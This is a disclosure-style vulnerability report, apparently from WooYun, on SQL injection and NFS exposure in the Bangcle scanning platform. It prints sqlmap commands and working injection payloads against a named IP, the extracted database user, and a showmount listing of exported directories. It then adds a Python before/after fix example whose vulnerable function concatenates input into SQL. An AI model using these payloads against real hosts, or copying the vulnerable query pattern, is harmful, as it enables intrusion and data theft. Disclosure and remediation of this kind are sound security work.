
SQL injection in the Bangcle (梆梆) security scanning platform exposes potential customers, plus an NFS issue

2015-06-28 20:15

Proof of vulnerability:

1. Injection

C:\Python27\sqlmap>sqlmap.py -u "http://42.62.59.221:8081/result?id=54c9fe0d996c5824e43dd4edbc34aa76" --dbms mysql --current-user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20140909}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:26:01

[22:26:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54c9fe0d996c5824e43dd4edbc34aa76' AND 4724=4724 AND 'PbCO'='PbCO

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54c9fe0d996c5824e43dd4edbc34aa76' AND (SELECT 9117 FROM(SELECT COUNT(*),CONCAT(0x7162676371,(SELECT (CASE WHEN (9117=9117) THEN 1 ELSE 0 END)),0x7175726c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uIev'='uIev

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=-1535' UNION ALL SELECT NULL,NULL,CONCAT(0x7162676371,0x4b42445a4258424d4447,0x7175726c71),NULL#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=54c9fe0d996c5824e43dd4edbc34aa76'; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54c9fe0d996c5824e43dd4edbc34aa76' AND SLEEP(5) AND 'WtXF'='WtXF
---
[22:26:01] [INFO] testing MySQL
[22:26:01] [INFO] confirming MySQL
[22:26:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:26:01] [INFO] fetching current user
current user: 'scanosclient@%'

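This leaked the names of 40,000 app users. It directly lets competitors learn who the potential customers are and compete for them.

There are also foreign apps from the international edition.
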

The same server also has an NFS vulnerability.

showmount -e 42.62.59.221

/home/sec/project 192.168.1.*
/home/sec/sharefolder 61.135.164.222

Fix:

The places that have been left unmaintained need to be looked after again.
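
An added example, not code from the original report or from the affected platform: a before/after of a lookup like `result?id=...`, where the hardened form checks the 32-hex-digit id shape seen in the URL above and binds the value as a query parameter. The table, column and function names are hypothetical, the rows are constructed, and sqlite3 stands in for the MySQL back end so it runs offline.

```python
import re
import sqlite3

# Constructed sample data. Table, column and function names are hypothetical,
# and sqlite3 stands in for the MySQL back end so the example runs offline.
SAMPLE_ID = "0123456789abcdef0123456789abcdef"
ID_RE = re.compile(r"[0-9a-f]{32}")  # shape of the id in the reported URL
# Boolean-based blind suffix as printed in the sqlmap output of the report.
REPORTED_SUFFIX = "' AND 4724=4724 AND 'PbCO'='PbCO"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE result (id TEXT PRIMARY KEY, app_name TEXT)")
    db.executemany(
        "INSERT INTO result VALUES (?, ?)",
        [(SAMPLE_ID, "demo-app-a"), ("f" * 32, "demo-app-b")],
    )
    return db


def lookup_vulnerable(db, raw_id):
    # Before: the request parameter is concatenated into the SQL text, so a
    # quote in raw_id closes the string literal and the rest is parsed as SQL.
    sql = "SELECT app_name FROM result WHERE id = '" + raw_id + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, raw_id):
    # Parameter binding: raw_id is only ever compared as a value.
    rows = db.execute("SELECT app_name FROM result WHERE id = ?", (raw_id,))
    return [row[0] for row in rows]


def lookup_hardened(db, raw_id):
    # After: reject anything that is not a 32-hex-digit id, then bind it.
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("malformed id")
    return lookup_bound(db, raw_id)


if __name__ == "__main__":
    db = make_db()
    probe = SAMPLE_ID + REPORTED_SUFFIX
    print("vulnerable:", lookup_vulnerable(db, probe))  # SQL in the id is evaluated
    print("bound only:", lookup_bound(db, probe))       # no row has that literal id
    try:
        lookup_hardened(db, probe)
    except ValueError as exc:
        print("hardened: rejected,", exc)
```

Binding alone already stops the injected text from being parsed as SQL; the format check is defence in depth and gives a clean rejection point for logging.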

Source: www.wooyun.org/bugs/wooyun-2015-0113990
